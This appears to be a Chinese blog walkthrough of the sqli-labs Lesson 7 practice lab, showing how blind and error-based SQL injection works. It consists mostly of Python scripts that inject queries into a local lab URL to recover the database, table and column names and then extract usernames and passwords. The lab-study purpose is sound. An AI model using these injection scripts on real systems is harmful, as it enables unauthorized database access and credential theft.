这个是盲注，也是报错注入，有点绕
先看看流程吧

图片.png

都是成双的，
第一句：判断有没注入
第二句：判断当前表有几个字段
第三句：判断数据库名长度
第四局：猜数据库名
第五句：判断语句有没正常执行
第六句：也是判断数据库名长度
第七句：判断有几个表
第八句：判断每个表长度
第九句：猜表名
第十句：判断有几个字段
第十一句：判断每个字段的长度
第十二句：猜字段名
第十三句：有几条数据
第十四句：每个数据长度
第十五句：猜数据

脚本

当然不可能使用手动咯，

# 数据库长度
database_length = 0
for _ in range(0,10):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length(database())>{} -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] Databse length is <{}>".format(_))
        database_length = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 猜数据名
import string
database_name = ""
for _ in range(1, database_length+1):
    for char in string.ascii_lowercase:
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr(database(),{},1)>'{}' -- ".format(_, char)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] find name is [{}]<{}>".format(_,char))
            database_name += char
            break
        else:
            print("[-] {}".format(char))

print(database_name)

图片.png

# 猜有几个表
tables_count = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='security' limit {},1))>0 -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] table count is <{}>".format(_))
        tables_count = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 每个表名有多长
tables_length = []
for _ in range(0,tables_count):
    for i in range(0, 100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='{}' limit {},1))>{} -- ".format(database_name,_, i)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}]table length is <{}>".format(_,i))
            tables_length.append(i)
            break
        else:
            print("[-] [{}]{}".format(_,i))

图片.png

# 猜表名
tables_name = []
for _ in range(0, tables_count):
    table_name = ""
    for i in range(1, tables_length[_]+1):
        for char in string.ascii_lowercase:
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1), {},1)>'{}' -- ".format(database_name,_,i, char)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}][{}]table name is <{}>".format(_,i, char))
                table_name += char
                break
            else:
                print("[-] [{}][{}]{}".format(_,i, char))
    tables_name.append(table_name)

图片.png

# 猜users表有几个字段
columns_count = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>0 -- ".format(tables_name[3], _)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] column count is <{}>".format(_))
        columns_count = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 每个字段名有多长
columns_length = []
for _ in range(0,columns_count):
    for i in range(0, 100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>{} -- ".format(tables_name[3],_, i)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}]column length is <{}>".format(_,i))
            columns_length.append(i)
            break
        else:
            print("[-] [{}]{}".format(_,i))

图片.png

# 猜列名
columns_name = []
for _ in range(0, columns_count):
    column_name = ""
    for i in range(1, columns_length[_]+1):
        for char in string.ascii_lowercase:
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select column_name from information_schema.columns where table_name='{}' limit {},1), {},1)>'{}' -- ".format(tables_name[3],_,i, char)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}][{}]column name is <{}>".format(_,i, char))
                column_name += char
                break
            else:
                print("[-] [{}][{}]{}".format(_,i, char))
    print(column_name)
    columns_name.append(column_name)

图片.png

# 猜有多少记录
row = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and (select count(id) from users)>{} -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] row name is <{}>".format(_))
        row = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 猜每个数据的长度
username_password_length = []
for _ in range(0, row):
    up = []
    # 用户名的长度
    for ui in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select username from users limit {},1))>={} -- ".format(_,ui)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}] username length is <{}>".format(_,ui-1))
            up.append(ui-1)
            break
        else:
            print("[-] [{}] {}".format(_,ui-1))
    # 密码的长度
    for pi in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select password from users limit {},1))>={} -- ".format(_,pi)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}] password length is <{}>".format(_,pi-1))
            up.append(pi-1)
            break
        else:
            print("[-] [{}] {}".format(_,pi-1))
    username_password_length.append(up)
username_password_length

图片.png

# 猜数据
data = []
for _ in range(row):
    username = ""
    for ui in range(username_password_length[_][0]):
        for inti in range(33,128):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select username from users limit {},1),{},1))>={}) -- ".format(_,ui+1,inti)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] username[{}]  is <{}>".format(_+1,ui+1, chr(inti-1)))
                username += chr(inti-1)
                break
            else:
                print("[-] [{}][{}] {}".format(_+1,ui+1, chr(inti)))
    print(username)
    password = ""
    for pi in range(username_password_length[_][1]):
        for inti in range(33,128):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select password from users limit {},1),{},1))>={}) -- ".format(_,pi+1,inti)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] password[{}]  is <{}>".format(_+1,pi+1, chr(inti-1)))
                password += chr(inti-1)
                break
            else:
                print("[-] [{}][{}] {}".format(_+1,pi+1, chr(inti)))
    print(password)
    data.append([username, password])

图片.png

算是完了，

可以优化，使用二分法，速度更快

sqli-labs-lesson7

脚本

算是完了，

你可能感兴趣的:(sqli-labs-lesson7)